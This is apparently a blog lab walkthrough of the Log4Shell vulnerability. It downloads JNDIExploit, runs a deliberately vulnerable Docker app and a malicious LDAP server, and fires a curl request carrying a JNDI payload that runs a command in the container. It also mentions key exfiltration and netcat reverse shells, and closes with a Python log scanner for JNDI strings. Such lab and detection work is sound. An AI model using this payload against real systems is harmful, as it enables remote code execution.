A recently discovered vulnerability in the popular Java logging tool Apache Log4j has been made public and the Internet is lit up like the proverbial Christmas tree! You can read up on Log4Shell over at Lunasec. There is also a list on GitHub showing the vulnerable web applications and vendors. But we’re here for the lab, so let’s get to it!

Disclaimer – as always only do this against a host you have explicit permission to do so with. Like your own lab, silly.

Setup
1 x Kali Linux VM, updated etc. The Kali VM IP is 10.0.0.1 in this example.
Install Docker.
Download JNDIExploit:
wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
unzip JNDIExploit.v1.2.zip

Run the vulnerable Spring Boot web application:
sudo docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

Exploit
1. Make sure the Docker Spring Boot web application is running:
sudo docker ps
2. Open a terminal window and start the JNDIExploit malicious LDAP server:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 10.0.0.1 -p 8888
3. Open a terminal tab and run the exploit:
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://10.0.0.1:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
This will execute touch /tmp/pwned inside the vulnerable web app container.
4. Verify:
$ sudo docker exec vulnerable-app ls -la /tmp
total 20
drwxrwxrwt 1 root root 4096 Dec 12 16:08 .
drwxr-xr-x 1 root root 4096 Dec 12 15:42 ..
drwxr-xr-x 2 root root 4096 Dec 12 15:43 hsperfdata_root
-rw-r--r-- 1 root root 0 Dec 12 16:08 pwned

And it’s done. This exploit is being used in all kinds of creative ways; the above is just a vanilla example. See this Twitter link, where an attacker serialises secret environment variables and keys (GCP, AWS etc.) into the JNDI LDAP string. I’ve also seen examples of a reverse shell with netcat.

Mitigate
The patch is out for Log4j; the issue is that so many web apps and vendors have to roll out fixes individually.
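On the detection side, here is an added Python example (not from the original post or from JNDIExploit) that scans constructed application log lines for the JNDI lookup string used in the curl request above and decodes the Base64 command segment that the JNDIExploit path convention carries, so a responder can see what an attempt tried to run. The log line format and IPs are made up for the sample.

```python
import base64
import binascii
import re

# Matches a JNDI lookup of the kind sent in the X-Api-Version header above:
# scheme, host:port and the remaining path of the lookup URL.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>ldaps?|rmi|dns)://(?P<host>[^/}\s]+)(?P<path>[^}\s]*)\}",
    re.IGNORECASE,
)
# JNDIExploit-style path segment that carries a Base64-encoded command.
B64_RE = re.compile(r"/Base64/(?P<b64>[A-Za-z0-9+/=]+)")


def decode_command(path):
    """Return the decoded command from a /Base64/<...> segment, or None."""
    m = B64_RE.search(path)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group("b64"), validate=True)
    except (binascii.Error, ValueError):
        return None  # malformed Base64: still flag the lookup, just no command
    return raw.decode("utf-8", "replace").strip()


def find_jndi_lookups(lines):
    """Scan log lines and return one finding per JNDI lookup string found."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        for m in JNDI_RE.finditer(line):
            findings.append({
                "line": lineno,
                "scheme": m.group("scheme").lower(),
                "callback": m.group("host"),          # attacker-controlled server
                "command": decode_command(m.group("path")),
            })
    return findings


# Constructed sample lines (not real logs): a benign request, the exact lookup
# from the curl command in this post, and an RMI variant without a command.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Dec/2021:16:07:59 +0000] "GET / HTTP/1.1" 200 X-Api-Version: "1.0"',
    '10.0.0.1 - - [12/Dec/2021:16:08:01 +0000] "GET / HTTP/1.1" 200 X-Api-Version: "${jndi:ldap://10.0.0.1:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}"',
    '10.0.0.7 - - [12/Dec/2021:16:09:13 +0000] "GET / HTTP/1.1" 200 X-Api-Version: "${jndi:rmi://10.0.0.9:1099/obj}"',
]

if __name__ == "__main__":
    for f in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {f['line']}: {f['scheme']} callback to {f['callback']}, command={f['command']!r}")
```

Run it against real access or application logs by feeding the lines to find_jndi_lookups; the callback host is the indicator worth blocking or hunting for in outbound connection logs.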